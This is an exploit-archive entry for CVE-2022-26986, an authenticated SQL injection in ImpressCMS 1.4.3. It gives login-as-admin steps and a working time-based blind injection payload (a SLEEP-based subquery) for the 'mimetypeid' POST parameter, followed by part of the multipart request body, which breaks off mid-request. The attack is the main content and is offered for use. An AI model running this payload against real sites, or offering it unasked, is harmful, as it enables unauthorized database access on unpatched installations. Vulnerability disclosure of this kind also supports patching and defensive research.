Exploits / Vulnerability Discovered : 2023-03-25 |
Type : webapps |
Platform : php
This exploit / vulnerability Impresscms v1.4.3 authenticated sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Authenticated Sql Injection in ImpressCMS v1.4.3
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)
# Date: 7th March 2022
# CVE ID: CVE-2022-26986
# Confirmed on release 1.4.3, this vulnerability is patched in the version 1.4.4 and above...
# Vendor: https://www.impresscms.org
# Source: https://github.com/ImpressCMS/impresscms/releases/tag/v1.4.3
###############################################
#Step1- Login with Admin Credentials
#Step2- Vulnerable Parameter to SQLi: mimetypeid (POST request):
1 AND (SELECT 3583 FROM (SELECT(SLEEP(5)))XdxE)
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="extension"
bin
-----------------------------40629177308912268471540748701
Content-Disposition: form-data; name="types"